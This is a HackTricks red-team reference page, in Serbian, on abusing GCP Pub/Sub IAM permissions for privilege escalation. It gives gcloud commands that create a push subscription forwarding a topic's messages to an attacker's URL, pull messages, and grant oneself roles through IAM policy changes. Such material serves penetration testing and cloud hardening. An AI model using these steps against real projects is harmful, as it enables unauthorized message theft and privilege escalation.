GCP - Pubsub Privesc

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

PubSub

Više informacija potražite u:

GCP - Pub/Sub Enum

pubsub.snapshots.create (pubsub.topics.attachSubscription)

Snapshoti topic‑ova sadrže trenutne unACKed poruke i svaku poruku posle njih. Možete kreirati snapshot topic‑a da biste pristupili svim porukama, izbegavajući direktan pristup topic‑u.

gcloud pubsub subscriptions create <subscription_name> --topic <topic_name> --push-endpoint https://<URL_to_push_to>

pubsub.snapshots.setIamPolicy

Dodelite prethodne dozvole sebi.

pubsub.subscriptions.create

Možete kreirati push subscription na topic koji će slati sve primljene poruke na naznačeni URL

pubsub.subscriptions.update

Postavite svoj URL kao push endpoint da biste ukrali poruke.

pubsub.subscriptions.consume

Pristupite porukama koristeći subscription.

gcloud pubsub subscriptions pull <SUSCRIPTION> \
--limit=50 \
--format="json" \
--project=<PROJECTID>

pubsub.subscriptions.setIamPolicy

Dodelite sebi bilo koju od prethodnih dozvola

# Add Binding
gcloud pubsub subscriptions add-iam-policy-binding <SUSCRIPTION_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Remove Binding
gcloud pubsub subscriptions remove-iam-policy-binding <SUSCRIPTION_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Change Policy
gcloud pubsub subscriptions set-iam-policy <SUSCRIPTION_NAME> \
<(echo '{
"bindings": [
{
"role": "<ROLE_OR_CUSTOM_ROLE>",
"members": [
"serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
]
}
]
}') \
--project=<PROJECT_ID>

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks